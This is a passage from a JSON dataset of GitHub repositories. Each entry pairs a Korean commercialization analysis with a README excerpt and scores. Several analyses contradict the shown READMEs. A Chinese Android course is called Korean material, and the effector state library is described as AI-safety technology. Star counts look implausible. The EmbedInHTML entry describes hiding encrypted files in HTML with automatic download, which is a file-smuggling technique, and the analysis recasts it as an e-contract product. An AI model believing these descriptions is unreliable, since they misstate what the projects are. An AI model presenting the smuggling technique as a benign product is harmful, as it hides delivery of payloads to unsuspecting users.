기술 회사가 AI 서비스를 빠르게 확장할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 챗봇 서비스 제공업체의 SaaS**: 고객사가 자신의 챗봇에 맞춤형 기능을 직접 추가할 수 있는 웹 기반 관리 도구로 판매\n2. ","readme_excerpt":"# susi_skill_cms\n\n[![Build Status](https://travis-ci.org/fossasia/susi_skill_cms.svg?branch=master)](https://travis-ci.org/fossasia/susi_skill_cms)\n\nA web application framework to edit SUSI.AI Skills. We merged this component now into the SUSI.AI main web application. Development continues here: https://github.com/fossasia/susi.ai\n\nPlease join us!\n\n## Communication\n\nPlease join our mailing list to discuss questions regarding the project: https://groups.google.com/group/susiai/\n\nOur chat channel is on gitter here: https://gitter.im/fossasia/susi.ai\n","composite_score":0.4065,"license_safety_tag":"restricted"},{"name":"lyz-code/autoimport","github_url":"https://github.com/lyz-code/autoimport","stars":6,"language":"Python","license":"GPL-3.0","abandonment_months":20,"description":"# autoimport 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 반복적으로 손으로 입력해야 하는 코드 라이브러리 선언을 자동으로 추가해주는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 개발자용 IDE 플러그인 판매**\n- VS Code, PyCharm 등 코딩 도구에 확장 프로그램으로 탑재하여 유료 구독 모델 운","readme_excerpt":"# Autoimport\n\n[![Actions Status](https://github.com/lyz-code/autoimport/workflows/Tests/badge.svg)](https://github.com/lyz-code/autoimport/actions)\n[![Actions Status](https://github.com/lyz-code/autoimport/workflows/Build/badge.svg)](https://github.com/lyz-code/autoimport/actions)\n[![Coverage Status](https://coveralls.io/repos/github/lyz-code/autoimport/badge.svg?branch=main)](https://coveralls.io/github/lyz-code/autoimport?branch=main)\n\nAutoimport missing python libraries.\n\nThroughout the development of a python program you continuously need to manage\nthe python import statements either because you need one new object or because\nyou no longer need it. This means that you need to stop writing whatever you\nwere writing, go to the top of the file, create or remove the import statement\nand then resume coding.\n\nThis workflow break is annoying and almost always unnecessary. `autoimport`\nsolves this problem if you execute it whenever you have an import error, for\nexample by configuring your ","composite_score":0.4065,"license_safety_tag":"restricted"},{"name":"enyo/dropzone","github_url":"https://github.com/enyo/dropzone","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":23,"description":"# enyo/dropzone 분석 보고서\n\n## 왜 보물인가\n파일을 드래그해서 놓기만 하면 자동으로 업로드되는 기능을 웹사이트에 쉽게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 저장소 SaaS**: Google Drive나 Dropbox 같은 파일 저장 서비스에서 사용자가 파일을 쉽게 업로드하게 함\n2. **설계 협업 도구**","readme_excerpt":"<img alt=\"Dropzone.js\" src=\"https://raw.githubusercontent.com/dropzone/dropzone/assets/github-logo.svg\" />\n\n[![Test and Release](https://github.com/dropzone/dropzone/actions/workflows/test-and-release.yml/badge.svg)](https://github.com/dropzone/dropzone/actions/workflows/test-and-release.yml)\n\nDropzone is a JavaScript library that turns any HTML element into a dropzone.\nThis means that a user can drag and drop a file onto it, and Dropzone will\ndisplay file previews and upload progress, and handle the upload for you via\nXHR.\n\nIt's fully configurable, can be styled according to your needs and is trusted by\nthousands.\n\n<div align=\"center\">\n  <img width=\"674\" alt=\"Dropzone Screenshot\" src=\"https://user-images.githubusercontent.com/133277/138495095-b026cc5c-9458-4e0b-8066-d8a9d0f7e72a.png\">\n</div>\n\n## Quickstart\n\nInstall:\n\n```bash\n$ npm install --save dropzone\n# or with yarn:\n$ yarn add dropzone\n```\n\nUse as **ES6 module** (recommended):\n\n```js\nimport { Dropzone } from \"dropzone\";\nconst drop","composite_score":0.4064,"license_safety_tag":"unknown"},{"name":"jcjohnson/neural-style","github_url":"https://github.com/jcjohnson/neural-style","stars":9,"language":"Lua","license":"mit","abandonment_months":100,"description":"# neural-style 저장소 분석\n\n## 왜 보물인가\n사진을 유명 화가의 그림 같은 스타일로 자동으로 변환해주는 기술로, 누구나 예술 작품을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사용자가 사진을 업로드하면 다양한 화풍으로 변환해주는 웹 애플리케이션 (예: 인스타그램 필터처럼)\n2. **내부 업무 도구**: 광고 ","readme_excerpt":"# neural-style\n\nThis is a torch implementation of the paper [A Neural Algorithm of Artistic Style](http://arxiv.org/abs/1508.06576)\nby Leon A. Gatys, Alexander S. Ecker, and Matthias Bethge.\n\nThe paper presents an algorithm for combining the content of one image with the style of another image using\nconvolutional neural networks. Here's an example that maps the artistic style of\n[The Starry Night](https://en.wikipedia.org/wiki/The_Starry_Night)\nonto a night-time photograph of the Stanford campus:\n\n<div align=\"center\">\n <img src=\"https://raw.githubusercontent.com/jcjohnson/neural-style/master/examples/inputs/starry_night_google.jpg\" height=\"223px\">\n <img src=\"https://raw.githubusercontent.com/jcjohnson/neural-style/master/examples/inputs/hoovertowernight.jpg\" height=\"223px\">\n <img src=\"https://raw.githubusercontent.com/jcjohnson/neural-style/master/examples/outputs/starry_stanford_bigger.png\" width=\"710px\">\n</div>\n\nApplying the style of different images to the same content image gives i","composite_score":0.4063,"license_safety_tag":"safe"},{"name":"jleetutorial/dockerapp","github_url":"https://github.com/jleetutorial/dockerapp","stars":242,"language":"Python","license":"NOASSERTION","abandonment_months":29,"description":"","readme_excerpt":"","composite_score":0.4063,"license_safety_tag":"unknown"},{"name":"googlesamples/android-ndk","github_url":"https://github.com/googlesamples/android-ndk","stars":5,"language":"C++","license":"Apache-2.0","abandonment_months":3,"description":"# Android NDK 저장소 분석\n\n## 왜 보물인가\n구글이 직접 만든 안드로이드 앱 개발 도구로, 스마트폰 앱을 더 빠르고 효율적으로 만들 수 있게 해주는 공식 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 플랫폼**: 고성능이 필요한 모바일 게임 엔진을 구축하고 라이선스 판매\n2. **앱 개발 교육 서비스**: 기업과 개발자를 대상","readme_excerpt":"# Android NDK Samples\n\nThis repository contains sample apps that use the [Android NDK].\n\nFor an explanation of the layout of this repository, see\n[ARCHITECTURE.md](ARCHITECTURE.md).\n\n## Build and run\n\n[![build](https://github.com/android/ndk-samples/actions/workflows/build.yml/badge.svg)](https://github.com/android/ndk-samples/actions)\n\n1. Clone the repository\n2. Open the whole project in Android Studio\n3. Install CMake 4.1.0 via the SDK Manager (must be done manually until\n   https://issuetracker.google.com/443137057 is fixed).\n4. Select the sample you want to run in the top bar (you may need to sync gradle\n   first)\n5. Click the play button to run the sample\n\nYou can also build the samples from the command line if you prefer. Use\n`./gradlew build` to build everything (if you're on Windows, use `.\\gradlew.bat`\ninstead of `./gradlew`). For individual tasks, see `./gradlew tasks`. To see the\ntasks for an individual sample, run the `tasks` task for that directory. For\nexample, `./gradlew","composite_score":0.4061,"license_safety_tag":"safe"},{"name":"kesenhoo/android-training-course-in-chinese","github_url":"https://github.com/kesenhoo/android-training-course-in-chinese","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":102,"description":"# Android 개발 학습 자료 저장소 분석\n\n## 왜 보물인가\n안드로이드 휴대폰 앱을 만드는 방법을 한국어로 배울 수 있는 완성된 교재로, 앱 개발을 배우고 싶은 한국인 개발자들의 진입장벽을 크게 낮춘다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 안드로이드 개발 강의 콘텐츠로 월구독형 교육 서비스 운영\n2. **기업 내부 교육 도구*","readme_excerpt":"# Android官方培训课程中文版(v0.9.7)\n\n![Android Training](android_training.jpg)\n\nGoogle Android团队在2012年的时候开设了**Android Training**板块 - <http://developer.android.com/training/index.html>，这些课程是学习Android应用开发的绝佳资料。我们通过Github发起开源协作翻译的项目，完成中文版的输出，欢迎大家传阅学习！\n文章中难免会有很多写的不对不好的地方，欢迎读者加入此协作项目，进行纠错，为完善这份教程贡献一点力量!\n\n## Github托管主页\n\n**<https://github.com/kesenhoo/android-training-course-in-chinese>**\n\n请读者点击Star进行关注并支持！\n\n## 在线阅读\n\n**<http://hukai.me/android-training-course-in-chinese/index.html>**\n\n### 更新记录\n* v0.9.7 - 2016/11/04\n* v0.9.6 - 2016/05/22\n* v0.9.5 - 2015/12/15\n* v0.9.4 - 2015/06/11\n* v0.9.3 - 2015/05/18\n* v0.9.2 - 2015/03/30\n* v0.9.1 - 2015/03/14\n* v0.9.0 - 2015/03/09\n* v0.8.0 - 2015/02/12\n* v0.7.0 - 2014/11/30\n* v0.6.0 - 2014/11/02\n* v0.5.0 - 2014/10/18\n* v0.4.0 - 2014/09/11\n* v0.3.0 - 2014/08/31\n* v0.2.0 - 2014/08/14\n* v0.1.0 - 2014/08/05\n\n## 参与方式\n\n你可以选择以下的方式帮忙修改纠正这份教程（推荐使用方法1）：\n\n1. 通过[在线阅读](http://hukai.me/android-training-course-in-chinese/index.html)课程的页面，找到[Github仓库](https://github.com/kesenhoo/an","composite_score":0.4061,"license_safety_tag":"safe"},{"name":"fossasia/susi_chromebot","github_url":"https://github.com/fossasia/susi_chromebot","stars":12,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":66,"description":"# SUSI ChromeBot 상용화 분석\n\n## 왜 보물인가\n크롬 브라우저에서 직접 사용할 수 있는 AI 어시스턴트로, 일반인들이 웹 검색과 정보 조회를 더 빠르게 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 직장인을 위한 \"스마트 웹 검색 도우미\" 구독 서비스로, 업무 중 필요한 정보를 자동으로 정리하고 요약해주는 유료 버전","readme_excerpt":"# Chrome extension to access SUSI.AI\n\n[![Codacy Badge](https://api.codacy.com/project/badge/Grade/98a620d9aed84320ab5d38e03e23a09b)](https://www.codacy.com/app/zamhaq/susi_chromebot?utm_source=github.com&utm_medium=referral&utm_content=fossasia/susi_chromebot&utm_campaign=badger)\n[![Build Status](https://travis-ci.org/fossasia/susi_chromebot.svg?branch=master)](https://travis-ci.org/fossasia/susi_chromebot)\n[![Join the chat at https://gitter.im/fossasia/susi_server](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/fossasia/susi_server)\n[![Twitter Follow](https://img.shields.io/twitter/follow/susiai_.svg?style=social&label=Follow&maxAge=2592000?style=flat-square)](https://twitter.com/susiai_)\n\nThis is a chrome extension to access SUSI.AI.\n\nIn certain situations the user wants to access certain functionalities of SUSI.AI without leaving the tab they are currently browsing. In those situations, using a chrome extension could turn out to be a viable option, and that is exactly ","composite_score":0.4059,"license_safety_tag":"restricted"},{"name":"taylorchen709/vue-admin","github_url":"https://github.com/taylorchen709/vue-admin","stars":8,"language":"Vue","license":"mit","abandonment_months":48,"description":"# Vue Admin 저장소 분석\n\n## 왜 보물인가\n비전공자도 쉽게 업무용 관리 시스템을 만들 수 있는 웹 기반 템플릿입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 직원 관리, 매출 현황 조회 등 관리자 대시보드 제공\n- **내부 업무 도구**: 회사 내부 직원들이 사용할 재무 현황, 프로젝트 진행률 모니터링 시스템\n- **","readme_excerpt":"**demo**: [https://taylorchen709.github.io/vue-admin/](https://taylorchen709.github.io/vue-admin/)\n\n# To start\n\nThis is a project template for [vue-cli](https://github.com/vuejs/vue-cli)\n\n``` bash\n# install dependencies\nnpm install\n\n# serve with hot reload at localhost:8081\nnpm run dev\n\n# build for production with minification\nnpm run build\n\n```\n\n# Folder structure\n* build - webpack config files\n* config - webpack config files\n* dist - build\n* src -your app\n    * api\n    * assets\n    * common\n    * components - your vue components\n    * mock\n    * styles\n    * views - your pages\n    * vuex\n    * App.vue\n    * main.js - main file\n    * routes.js\n* static - static assets\n\n# Theme\nYou can change theme by \n1. Generate theme packages by [https://elementui.github.io/theme-preview/#/](https://elementui.github.io/theme-preview/#/)\n2. Put theme packages in src/assets/theme/\n3. Edit src/main.js \n``` bash\n   import 'element-ui/lib/theme-default/index.css'\n   to\n   import './assets/theme/your-them","composite_score":0.4059,"license_safety_tag":"safe"},{"name":"zerobias/effector","github_url":"https://github.com/zerobias/effector","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# zerobias/effector 분석 보고서\n\n## 왜 보물인가\n복잡한 상황에서 올바른 판단을 내리는 AI 시스템을 더 안전하고 신뢰할 수 있게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **의료 진단 SaaS**: 의사를 돕는 AI가 여러 검사 결과를 종합해 진단을 제시할 때, 실수를 줄이는 데 활용\n2. **금융사 내부 도구**: 대출 심사","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://effector.dev\" target=\"_blank\" rel=\"noopener noreferrer\">\n    <img width=\"150\" src=\"https://raw.githubusercontent.com/effector/effector/master/documentation/public/favicon.svg\" alt=\"Effector Comet Logo\" />\n  </a>\n</p>\n<br />\n<p align=\"center\">\n  <a href=\"https://gitter.im/effector/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge\"><img src=\"https://badges.gitter.im/effector/community.svg\" alt=\"join gitter\" /></a>\n  <a href=\"https://github.com/effector/effector/actions/workflows/tests.yml\"><img src=\"https://github.com/effector/effector/actions/workflows/tests.yml/badge.svg?branch=master\" alt=\"build status\" /></a>\n  <a href=\"https://discord.gg/t3KkcQdt\"><img src=\"https://img.shields.io/badge/chat-discord-blue?style=flat&logo=discord\" alt=\"discord chat\"></a>\n  <a href=\"https://www.patreon.com/zero_bias/overview\"><img src=\"https://img.shields.io/badge/become-a%20patron-%23f96854\" alt=\"become a patron\" /></a>\n  <a href=\"https://deepwiki.c","composite_score":0.4058,"license_safety_tag":"safe"},{"name":"uploadcare/pillow-simd","github_url":"https://github.com/uploadcare/pillow-simd","stars":9,"language":"Python","license":"NOASSERTION","abandonment_months":20,"description":"# uploadcare/pillow-simd 분석\n\n## 왜 보물인가\n사진과 이미지를 빠르게 처리할 수 있게 해주는 핵심 기술로, 웹사이트나 앱에서 이미지 로딩 속도를 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 기반 이미지 편집 서비스나 포토 스토리지 앱에서 빠른 사진 처리 제공\n2. **내부 업무 도구**","readme_excerpt":"# Pillow-SIMD\n\nPillow-SIMD is highly optimized version of [Pillow library][original-docs]\nfor x86 architecture (mainly Intel and AMD CPUs).\n\nPillow-SIMD is \"following\" Pillow which means it is\ndrop-in replacements for Pillow of the same version.\nFor example, `Pillow-SIMD 3.2.0.post3` is a drop-in replacement for\n`Pillow 3.2.0`, and  `Pillow-SIMD 3.3.3.post0` — for `Pillow 3.3.3`.\n\nFor more information on the original Pillow, please refer to:\n[read the documentation][original-docs],\n[check the changelog][original-changelog] and\n[find out how to contribute][original-contribute].\n\n\n## Why SIMD\n\nThere are multiple ways to tweak image processing performance.\nTo name a few, such ways can be: utilizing better algorithms, optimizing existing implementations, \nusing more processing power and/or resources. \nOne of the great examples of using a more efficient algorithm is [replacing][gaussian-blur-changes] \na convolution-based Gaussian blur with a sequential-box one.\n\nSuch examples are rather rar","composite_score":0.4057,"license_safety_tag":"unknown"},{"name":"velopert/bitimulate","github_url":"https://github.com/velopert/bitimulate","stars":30,"language":"JavaScript","license":"GPL-3.0","abandonment_months":90,"description":"# Bitimulate 프로젝트 분석\n\n## 왜 보물인가\n가상화폐 시장을 실시간으로 모의 거래하며 배울 수 있는 교육용 플랫폼으로, 실제 돈을 잃지 않고 투자 감각을 기를 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 암호화폐 입문자를 위한 월간 구독형 학습 플랫폼 제공\n- **내부 업무 도구**: 금융사나 증권사의 직원 교육용 모의","readme_excerpt":"# bitimulate\n\n> Bitimulate is closed; the service is not available anymore. \n\n![](https://i.imgur.com/DQUz2Bb.png)\n\n## About\n\nBitimulate is compound word of **Bit**coin and S**imulate**. This service provides a simulated cryptocurrency trading system. Data used in this service rely on realtime information at [Poloniex](https://poloniex.com).\n\nCurrently, Korean is the only supported language in this service. English, and other languages might be implemented later on...\n\n## Stack\n\nEverything in this project is in JavaScript. \n\n### Frontend\n\n- react\n- react-router\n- redux\n- CSS Module + Sass\n- [Atomic React Component (ARc)](https://arc.js.org)\n- EChart\n\n### Server\n\n- Node.js\n- Koa\n- MongoDB (mongoose)\n- Redis\n- Websocket\n\n#### AWS\n- EC2\n- S3\n- Cloudfront\n- ElasticLoadbalancer\n\n## Running on your Machine\n\nThese instructions will get you a copy of the project up and running on your local machine for development or testing purposes.\n\n### Prerequisites\n- Node.js v8^\n- yarn\n- MongoDB\n- Redis\n\n","composite_score":0.4056,"license_safety_tag":"restricted"},{"name":"sunym1993/flash-linux0.11-talk","github_url":"https://github.com/sunym1993/flash-linux0.11-talk","stars":19,"language":"HTML","license":"unknown","abandonment_months":14,"description":"# flash-linux0.11-talk 저장소 분석\n\n## 왜 보물인가\n리눅스 운영체제의 역사를 배우고 싶어 하는 학생과 개발자들을 위한 실습 교육용 자료이며, 가장 기초적인 단계부터 체계적으로 학습할 수 있는 드문 한국어 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 프로그래밍 입문자를 위한 유료 강의 콘텐츠로 제공\n2. **","readme_excerpt":"## 品读 Linux 0.11 核心代码\n\n<p align='center'>\n<a href=\"https://www.github.com/sunym1993\" target=\"_blank\"><img src=\"https://img.shields.io/badge/作者-闪客-2277cc.svg?style=flat-square&logo=GitHub\"></a>\n<a href=\"https://space.bilibili.com/325864133\" target=\"_blank\"><img src=\"https://img.shields.io/badge/bilibili-飞天闪客-2277cc.svg?style=flat-square&logo=bilibili\"></a>\n<a href=\"https://user-images.githubusercontent.com/25787738/141248489-c7dc20c1-cc5d-4a2d-bb5d-b5d8f9182058.jpg\" target=\"_blank\"><img src=\"https://img.shields.io/badge/公众号-闪客-009977.svg?style=flat-square&logo=WeChat\"></a>\n</p>\n\n**目标**：带大家把 Linux 0.11 核心代码与操作系统的设计思想啃下来\n\n**书籍购买**：[《Linux 源码趣读》](https://mp.weixin.qq.com/s/UJ9llP9TVxruhIC9jj-Q1g)\n\n**开篇词**：[闪客新系列！你管这破玩意叫操作系统源码](https://mp.weixin.qq.com/s/tvbkGLfhDq03xxM-FZ4zuA)\n\n---\n\n### 已发布文章：\n\n[开篇词](https://mp.weixin.qq.com/s/tvbkGLfhDq03xxM-FZ4zuA)\n\n* **第一部分：进入内核前的苦力活**\n\n   * [第1回 最开始的两行代码](https://mp.weixin.qq.com/s/LIsqRX51W7d_yw-HN-s2DA)\n   * [第2回 自己给自己挪个地儿](https://mp.weixin.qq.com/s","composite_score":0.4056,"license_safety_tag":"unknown"},{"name":"tensorflow/magenta","github_url":"https://github.com/tensorflow/magenta","stars":5,"language":"Python","license":"Apache-2.0","abandonment_months":5,"description":"# TensorFlow Magenta 상용화 분석\n\n## 왜 보물인가\n인공지능이 작곡하고 음악을 만들 수 있도록 돕는 구글의 기술로, 음악 제작 분야에 혁신을 가져올 수 있는 핵심 엔진입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 음악 제작 웹 플랫폼**\n- 브라우저에서 누구나 AI가 만든 음악을 편집하고 다운로드할 수 있는 구독형 서비스","readme_excerpt":"# Status\n\nThis repository is currently inactive (archived, read only) and serves only as a supplement some of our papers. We have transitioned to using individual repositories for new projects. For our current work, see the [Magenta website](https://g.co/magenta) and [Magenta GitHub Organization](https://github.com/magenta).\n\n# Magenta\n\n<img src=\"magenta-logo-bg.png\" height=\"75\">\n\n[![Build Status](https://github.com/magenta/magenta/workflows/build/badge.svg)](https://github.com/magenta/magenta/actions?query=workflow%3Abuild)\n [![PyPI version](https://badge.fury.io/py/magenta.svg)](https://badge.fury.io/py/magenta)\n\n**Magenta** is a research project exploring the role of machine learning\nin the process of creating art and music.  Primarily this\ninvolves developing new deep learning and reinforcement learning\nalgorithms for generating songs, images, drawings, and other materials. But it's also\nan exploration in building smart tools and interfaces that allow\nartists and musicians to exten","composite_score":0.4055,"license_safety_tag":"safe"},{"name":"liaohuqiu/android-Ultra-Pull-To-Refresh","github_url":"https://github.com/liaohuqiu/android-Ultra-Pull-To-Refresh","stars":5,"language":"Java","license":"mit","abandonment_months":36,"description":"# android-Ultra-Pull-To-Refresh 분석\n\n## 왜 보물인가\n스마트폰 앱에서 화면을 위에서 아래로 당겨서 새로운 정보를 새로고침하는 기능을 만드는 도구로, 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **뉴스 앱 서비스**: 사용자가 화면을 당겨서 최신 기사를 자동으로 불러오는 기능 제공\n2. **소셜 미","readme_excerpt":"###### Welcome to follow me on GitHub or Twitter\n\nGitHub: https://github.com/liaohuqiu\n\nTwitter: https://twitter.com/liaohuqiu\n\n---\n\n[![Build Status](https://travis-ci.org/liaohuqiu/android-Ultra-Pull-To-Refresh.svg?branch=master)](https://travis-ci.org/liaohuqiu/android-Ultra-Pull-To-Refresh)\n[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-Ultra%20Pull%20To%20Refresh-brightgreen.svg?style=flat)](https://android-arsenal.com/details/1/1180)\n\n#### [中文版文档](https://github.com/liaohuqiu/android-Ultra-Pull-To-Refresh/blob/master/README-cn.md)\n\nWanna auto-load-more? This will be what you want: https://github.com/liaohuqiu/android-cube-app\n\n# Ultra Pull To Refresh\n\nIt's a replacement for the deprecated pull to refresh solution. It can contain any view you want.\n\nIt's easy to use and more powerful than SwipeRefreshLayout.\n\nIt's well designed, you can customize the UI effect you want as easy as adding a headview to ListView.\n\nSupport `API LEVEL >= 8`, all snapshots are taken f","composite_score":0.4054,"license_safety_tag":"safe"},{"name":"santinic/pampy","github_url":"https://github.com/santinic/pampy","stars":6,"language":"Python","license":"MIT","abandonment_months":16,"description":"# santinic/pampy 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터를 간단한 규칙으로 자동 분류하는 기술로, 비즈니스의 반복적인 의사결정을 자동화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 문의를 자동으로 분류하고 우선순위를 매기는 AI 챗봇 관리 플랫폼\n2. **내부 업무 도구**: 회계팀의 영수증을 자동으로 ","readme_excerpt":"![Pampy in Star Wars](https://raw.githubusercontent.com/santinic/pampy/master/imgs/pampy.png \"Pampy in Star Wars\")\n\n# Pampy: Pattern Matching for Python\n[![Coverage Status](https://coveralls.io/repos/github/santinic/pampy/badge.svg?branch=master)](https://coveralls.io/github/santinic/pampy?branch=master)\n[![PyPI version](https://badge.fury.io/py/pampy.svg)](https://badge.fury.io/py/pampy)\n\nPampy is pretty small (150 lines), reasonably fast, and often makes your code more readable\nand hence easier to reason about. [There is also a JavaScript version, called Pampy.js](https://github.com/santinic/pampy.js).\n\n<kbd>\n  <img src=\"https://raw.githubusercontent.com/santinic/pampy/master/imgs/slide1.png\" width=\"700\">\n</kbd>\n\n## You can write many patterns\n\nPatterns are evaluated in the order they appear.\n\n<kbd>\n  <img src=\"https://raw.githubusercontent.com/santinic/pampy/master/imgs/slide2.png\" width=\"700\">\n</kbd>\n\n\n## You can write Fibonacci\nThe operator _ means \"any other case I didn't think o","composite_score":0.4052,"license_safety_tag":"safe"},{"name":"fossasia/yaydoc","github_url":"https://github.com/fossasia/yaydoc","stars":12,"language":"JavaScript","license":"GPL-3.0","abandonment_months":42,"description":"# YayDoc 프로젝트 분석\n\n## 왜 보물인가\n복잡한 문서 작업을 자동으로 처리해주는 도구로, 기술 문서를 쉽게 만들고 관리하려는 모든 팀이 필요로 합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스로 운영**\n- 회사들이 월 구독료를 내고 자동 문서화 서비스를 사용하도록 제공\n\n**2. 내부 업무 도구로 판매**\n- 소프트웨어 회사의 개발팀","readme_excerpt":"# Yaydoc\nDevelopment [![Build Status](https://travis-ci.org/fossasia/yaydoc.svg?branch=development)](https://travis-ci.org/fossasia/yaydoc)\nMaster [![Build Status](https://travis-ci.org/fossasia/yaydoc.svg?branch=master)](https://travis-ci.org/fossasia/yaydoc)\n[![Join the chat at https://gitter.im/fossasia/yaydoc](https://badges.gitter.im/fossasia/yaydoc.svg)](https://gitter.im/fossasia/yaydoc?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nYaydoc is an automated documentation generation and deployment project that generates documentation for its registered repositories on each commit and deploys it to Github Pages.\n\n## Communication\n- Please join our mailing list to discuss questions regarding the project: https://groups.google.com/forum/#!forum/yaydoc\n- Our chat channel is on Gitter here: [gitter.im/fossasia/yaydoc](http://gitter.im/fossasia/yaydoc)\n\n## Deployments\n\n* Master Branch can be tested on [yaydoc.herokuapp.com](https://yaydoc.herokuapp.com/)\n* De","composite_score":0.4052,"license_safety_tag":"restricted"},{"name":"render-examples/flask-hello-world","github_url":"https://github.com/render-examples/flask-hello-world","stars":83,"language":"Python","license":"MIT","abandonment_months":10,"description":"","readme_excerpt":"","composite_score":0.4052,"license_safety_tag":"safe"},{"name":"BlackrockDigital/startbootstrap","github_url":"https://github.com/BlackrockDigital/startbootstrap","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":68,"description":"# BlackrockDigital/startbootstrap 상업화 분석\n\n## 왜 보물인가\n웹사이트를 만들 때 필요한 디자인 틀을 무료로 제공해서, 전문가가 아닌 사람도 프로답게 보이는 사이트를 빠르게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**\n- 중소 스타트업을 위한 \"1시간 만에 웹사이트 만들기\" 온라인 강좌 플랫폼으","readme_excerpt":"# Start Bootstrap\n\nA library of open source, free to download, MIT licensed website themes and template based on [Bootstrap](https://getbootstrap.com/). All of the templates and themes featured on Start Bootstrap are up to date for Bootstrap 4!\n\nFor more information please visit the website at <https://startbootstrap.com>.\n\n## Themes\n\n- [**Agency**](https://startbootstrap.com/themes/agency/) - A one page agency theme.\n- [**Business Casual**](https://startbootstrap.com/themes/business-casual/) - A fully developed business website.\n- [**Clean Blog**](https://startbootstrap.com/themes/clean-blog/) - A clean blog theme.\n- [**Clean Blog - Jekyll**](https://startbootstrap.com/themes/clean-blog-jekyll/) - A clean blog theme.\n- [**Coming Soon**](https://startbootstrap.com/themes/coming-soon/) - A coming soon theme.\n- [**Creative**](https://startbootstrap.com/themes/creative/) - A one page creative theme.\n- [**Freelancer**](https://startbootstrap.com/themes/freelancer/) - A one page freelancer ","composite_score":0.4049,"license_safety_tag":"unknown"},{"name":"Arno0x/EmbedInHTML","github_url":"https://github.com/Arno0x/EmbedInHTML","stars":9,"language":"HTML","license":"GPL-3.0","abandonment_months":105,"description":"# EmbedInHTML 분석 보고서\n\n## 왜 보물인가\n웹페이지에 숨겨진 파일이나 데이터를 삽입할 수 있는 기술로, 온라인 문서 공유 시 부가 정보를 함께 전달하는 혁신적인 방식을 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 전자계약 플랫폼**\n- 계약서 HTML과 함께 서명 인증서, 메타데이터를 함께 임베딩하여 법적 증거력 강화\n","readme_excerpt":"Embed and hide any file in HTML\n============\n\nAuthor: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x)\n\nWhat this tool does is taking a file (*any type of file*), encrypt it, and embed it into an HTML file as ressource, along with an automatic download routine simulating a user clicking on the embedded ressource.\n\nThen, when the user browses the HTML file, the embedded file is decrypted on the fly, saved in a temporary folder, and the file is then presented to the user as if it was being downloaded from the remote site. Depending on the user's browser and the file type presented, the file can be automatically opened by the browser.\n\nThis tool comes in two flavors, providing the same overall functionnality but with some slight changes in the way of using it:\n\n  1. An **python script** which generates the output HTML file based on a template, using **RC4 encryption** routines, and embedding the decryption key within the output file. The resulting HTML can either be browsed by the targ","composite_score":0.4048,"license_safety_tag":"restricted"},{"name":"M-J-Murray/MAMEToolkit","github_url":"https://github.com/M-J-Murray/MAMEToolkit","stars":7,"language":"Python","license":"GPL-2.0","abandonment_months":78,"description":"# MAMEToolkit 상용화 분석\n\n## 왜 보물인가\n오래된 게임기의 동작을 현대 컴퓨터에서 재현하는 기술로, 게임사와 박물관, 게임 연구기관이 찾는 핵심 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 에뮬레이션 클라우드 서비스**: 웹브라우저에서 바로 레트로 게임을 즐기는 구독형 플랫폼\n2. **박물관·교육 기관 솔루션**: 게임사와 박물관을","readme_excerpt":"# The MAME RL Algorithm Training Toolkit\n\n## About\nThis Python library will allow you to train your reinforcement learning algorithm on almost any arcade game. It is currently available on Linux systems and works as a wrapper around [MAME](http://mamedev.org/). The toolkit allows your algorithm to step through gameplay while recieving the frame data and internal memory address values for tracking the games state, along with sending actions to interact with the game.\n\n## Requirements:\n- Operating system: Vast majority of desktop and server Linux distributions\n- Instruction set: amd64 (this includes intel CPUs)\n- Python version: 3.6 or greater\n\n**NOTE**: If you are using an uncommon linux distribution or a CPU with a different instruction set, see section [Compiling custom MAME](#Compiling-custom-MAME).\n\n## Installation\nYou can use `pip` to install the library, just run:\n```bash\npip install MAMEToolkit\n```\n\n**DISCLAIMER: We are unable to provide you with any game ROMs. It is the users ow","composite_score":0.4047,"license_safety_tag":"restricted"},{"name":"fossasia/meilix-generator","github_url":"https://github.com/fossasia/meilix-generator","stars":12,"language":"HTML","license":"LGPL-3.0","abandonment_months":80,"description":"# meilix-generator 분석\n\n## 왜 보물인가\n개인용 리눅스 운영체제를 웹에서 클릭만으로 만들 수 있는 도구라 기술 초보자도 자신의 맞춤형 컴퓨터 운영체제를 간단히 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 교육기관이 학생들용 맞춤형 리눅스 환경을 온라인으로 생성·배포하는 플랫폼\n- **내부 업무 도구**: 대기","readme_excerpt":"# Meilix Generator\n<p>\n    <img align= 